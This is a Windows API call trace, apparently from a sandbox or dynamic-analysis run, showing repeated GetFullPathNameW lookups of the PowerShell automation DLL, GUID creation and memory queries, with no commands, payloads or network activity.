	[0427.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.470] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xfd6fdf29, Data2=0x67a0, Data3=0x48f1, Data4=([0]=0xb1, [1]=0xa3, [2]=0xdb, [3]=0x7d, [4]=0xdd, [5]=0x7a, [6]=0x5f, [7]=0x5d))) returned 0x0
	[0427.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.471] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x6f95d897, Data2=0xcf68, Data3=0x46ff, Data4=([0]=0xa7, [1]=0x7c, [2]=0x57, [3]=0x30, [4]=0xf8, [5]=0xe8, [6]=0x61, [7]=0xd0))) returned 0x0
	[0427.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.472] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x44715075, Data2=0x7de0, Data3=0x4a87, Data4=([0]=0xbc, [1]=0x3, [2]=0x13, [3]=0x69, [4]=0x97, [5]=0x4a, [6]=0x5c, [7]=0x68))) returned 0x0
	[0427.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.472] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x83f13c51, Data2=0x141a, Data3=0x4cbf, Data4=([0]=0xb8, [1]=0x32, [2]=0x35, [3]=0x9b, [4]=0xd3, [5]=0x9b, [6]=0xb, [7]=0x85))) returned 0x0
	[0427.472] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x113810da, Data2=0x84e9, Data3=0x4502, Data4=([0]=0xa7, [1]=0x71, [2]=0xa9, [3]=0x87, [4]=0x22, [5]=0x42, [6]=0xe2, [7]=0x77))) returned 0x0
	[0427.473] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xb9766af7, Data2=0x9481, Data3=0x4333, Data4=([0]=0xad, [1]=0xce, [2]=0x2e, [3]=0x43, [4]=0x2f, [5]=0xc3, [6]=0xce, [7]=0x72))) returned 0x0
	[0427.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.473] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x2d4e4aa0, Data2=0x951d, Data3=0x48f4, Data4=([0]=0x85, [1]=0xed, [2]=0xa2, [3]=0x49, [4]=0x19, [5]=0x24, [6]=0x9a, [7]=0xe6))) returned 0x0
	[0427.473] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.474] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.474] VirtualQuery (in: lpAddress=0x18b640, lpBuffer=0x18c500, dwLength=0x30 | out: lpBuffer=0x18c500*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.475] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.475] VirtualQuery (in: lpAddress=0x18b640, lpBuffer=0x18c500, dwLength=0x30 | out: lpBuffer=0x18c500*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.476] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.476] VirtualQuery (in: lpAddress=0x18b640, lpBuffer=0x18c500, dwLength=0x30 | out: lpBuffer=0x18c500*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.476] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.476] VirtualQuery (in: lpAddress=0x18b640, lpBuffer=0x18c500, dwLength=0x30 | out: lpBuffer=0x18c500*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.476] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.476] VirtualQuery (in: lpAddress=0x18b640, lpBuffer=0x18c500, dwLength=0x30 | out: lpBuffer=0x18c500*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.476] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.477] VirtualQuery (in: lpAddress=0x18b640, lpBuffer=0x18c500, dwLength=0x30 | out: lpBuffer=0x18c500*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.477] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.477] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.477] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.477] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.477] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.478] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.478] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.478] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xa3a3180, Data2=0x4589, Data3=0x4d1d, Data4=([0]=0xa7, [1]=0xa8, [2]=0x71, [3]=0xaa, [4]=0xcc, [5]=0x48, [6]=0x6a, [7]=0x3c))) returned 0x0
	[0427.478] VirtualQuery (in: lpAddress=0x18bec0, lpBuffer=0x18cd80, dwLength=0x30 | out: lpBuffer=0x18cd80*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.478] VirtualQuery (in: lpAddress=0x18bec0, lpBuffer=0x18cd80, dwLength=0x30 | out: lpBuffer=0x18cd80*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.478] VirtualQuery (in: lpAddress=0x18bf50, lpBuffer=0x18ce10, dwLength=0x30 | out: lpBuffer=0x18ce10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.478] VirtualQuery (in: lpAddress=0x18bec0, lpBuffer=0x18cd80, dwLength=0x30 | out: lpBuffer=0x18cd80*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.478] VirtualQuery (in: lpAddress=0x18bf50, lpBuffer=0x18ce10, dwLength=0x30 | out: lpBuffer=0x18ce10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.479] VirtualQuery (in: lpAddress=0x18bec0, lpBuffer=0x18cd80, dwLength=0x30 | out: lpBuffer=0x18cd80*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.479] VirtualQuery (in: lpAddress=0x18bf50, lpBuffer=0x18ce10, dwLength=0x30 | out: lpBuffer=0x18ce10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.479] VirtualQuery (in: lpAddress=0x18bec0, lpBuffer=0x18cd80, dwLength=0x30 | out: lpBuffer=0x18cd80*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.479] VirtualQuery (in: lpAddress=0x18bf50, lpBuffer=0x18ce10, dwLength=0x30 | out: lpBuffer=0x18ce10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.479] VirtualQuery (in: lpAddress=0x18bec0, lpBuffer=0x18cd80, dwLength=0x30 | out: lpBuffer=0x18cd80*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
